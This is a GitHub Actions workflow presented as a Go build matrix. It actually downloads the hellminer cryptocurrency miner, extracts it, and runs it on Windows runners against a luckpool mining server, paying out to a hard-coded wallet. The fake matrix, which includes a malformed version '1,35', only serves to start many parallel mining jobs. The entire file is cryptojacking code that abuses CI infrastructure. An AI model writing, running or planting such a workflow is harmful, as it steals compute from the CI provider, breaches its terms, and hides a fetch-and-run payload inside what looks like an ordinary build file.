name: kapten_crypto
 
on: [workflow_dispatch]
 
jobs:
  build:
    name: kapten_crypto
    runs-on: windows-latest
    strategy:
      max-parallel: 5
      fail-fast: false
      matrix:
        go: [1.0, 1.1, 1.2, 1.3, 1,35]
        flag: [A, B, C, D, E, F, G, H, I]
    env:
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}
    steps:
    - name: DOWNLOAD
      run: Invoke-WebRequest https://github.com/hellcatz/luckpool/blob/master/miners/hellminer_cpu_win64_avx2.zip -OutFile hellminer_cpu_win64_avx2.zip
    - name: Extract
      run: Expand-Archive hellminer_cpu_win64_avx2.zip
    - name: Running
      run: .\hellminer_cpu_win64_avx2.zip\hellminer.exe -c stratum+tcp://ap.luckpool.net:3956 -u RG2FbYHB3HrR4tguXMTziZH7Ec8MjZkDfs.ibenk01 -p x --cpu 2
    - name: END
      run: exit
